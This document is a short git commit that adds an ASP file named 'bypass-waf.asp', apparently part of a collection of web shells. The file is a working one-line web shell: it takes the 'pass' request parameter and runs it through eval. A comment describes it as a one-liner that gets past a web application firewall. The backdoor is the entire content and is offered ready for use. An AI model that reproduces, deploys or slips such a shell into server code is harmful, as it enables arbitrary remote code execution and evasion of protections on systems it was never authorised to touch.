add bypass-waf.asp

This commit is contained in:
tennc 2014-11-17 10:26:20 +08:00
parent 6eb3ff3f9e
commit a992550251

9
asp/bypass-waf.asp Normal file
View file

@ -0,0 +1,9 @@
<%
dim x1,x2
x1 = request("pass")
x2 = x1
eval x2
%>
<!-- yes++ -->
<!-- 一句话 pass waf -->